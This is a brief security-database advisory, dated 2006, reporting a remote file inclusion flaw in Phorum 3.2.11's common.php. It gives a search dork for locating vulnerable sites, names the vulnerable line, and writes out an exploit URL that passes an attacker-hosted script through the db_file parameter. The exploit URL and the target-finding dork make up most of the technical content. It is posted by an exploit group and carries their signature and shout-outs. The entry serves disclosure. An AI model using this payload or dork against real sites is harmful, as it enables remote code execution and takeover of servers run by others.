Phorum <= 3.2.11 (common.php) Remote File Include Vulnerability

2006-12-06T00:00:00
ID SECURITYVULNS:DOC:15319
Type securityvulns
Reporter Securityvulns
Modified 2006-12-06T00:00:00

Description

=========================================================== Yee7TeaM

WwW.Yee7.CoM

Software: Phorum v3.2.11

Vendor: http://www.phorum.org/

Download: http://skrypty.webpc.pl/pobierz274.html

Dork: "Copyright (C) 2000 Phorum Development Team" and back form doc folder :)

Description:

Line 31 of common.php

> >> // $db_file = './db/postgresql65.php'; >

Exploit: http://[localhost]/[paTh]/common.php?db_file=[Ev!lScript]

=========================================================== By: Mr-m07 Thanx To: ShockShadow & AL-SHIKH WwW.Yee7.CoM ===========================================================